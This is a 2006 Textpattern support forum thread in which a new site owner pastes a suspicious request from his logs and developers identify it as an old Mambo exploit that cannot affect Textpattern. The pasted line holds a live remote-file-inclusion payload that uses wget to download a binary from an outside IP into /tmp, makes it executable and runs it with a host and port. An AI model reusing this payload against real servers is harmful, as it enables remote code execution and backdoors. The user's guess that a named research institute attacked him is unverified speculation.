Textpattern CMS support forum
You are not logged in. Register | Login | Help
- Topics: Active | Unanswered
Pages: 1
#1 2006-01-21 02:24:15
- Anton Ross
- New Member
- Registered: 2006-01-21
- Posts: 4
HACKING MY SITE? (jesus.irb.hr server)
Someone at the Institut Ruđer Bošković tried to hack into my site, I believe.
I was looking at the log of who visited (my site is barely live yet, I just installed TXP) and saw a werid URL:
jesus.irb.hr
They tried the following command…looks like they were trying to change my file permissions, I think.
index.php?option=com_content&do_pdf=1&id=1…
index2.php?_REQUEST[option]=com_content&_REQUE…
ST[Itemid]=1&GLOBALS=&mosConfig_absolute_p…
ath=http://200.72.130.29/cmd.gif?&cmd=cd%20/tm…
p;wget%20200.207.91.25/bash;chmod%20744%20bash;./b…
ash;0209.61.187.106%208080;0
Any how…I went and found the owner of this server:
http://www.irb.hr/
Some crazy Croatian Science Institute.
That being said…would the obove command actually work?
Please, someone let me know. Otherwise, I may have to use a different blog software package.
Thanks,
Anton
Offline
Offline
#3 2006-01-21 02:34:53
- KurtRaschke
- Plugin Author
- Registered: 2004-05-16
- Posts: 275
Re: HACKING MY SITE? (jesus.irb.hr server)
That request is trying to exploit a rather old hole in Mambo. It won’t do anything to your Textpattern instance, but you still might want to report it to the irb.hr administrators.
-Kurt
kurt@kurtraschke.com
Offline
#4 2006-01-21 22:07:53
- zem
- Developer Emeritus
- From: Melbourne, Australia
- Registered: 2004-04-08
- Posts: 2,579
Re: HACKING MY SITE? (jesus.irb.hr server)
That being said…would the obove command actually work?
What makes you think it would?
Kurt is spot on – it’s an old Mambo exploit, nothing to do with Textpattern.
Alex
Offline
#5 2006-01-21 22:56:43
- zem
- Developer Emeritus
- From: Melbourne, Australia
- Registered: 2004-04-08
- Posts: 2,579
Offline
Pages: 1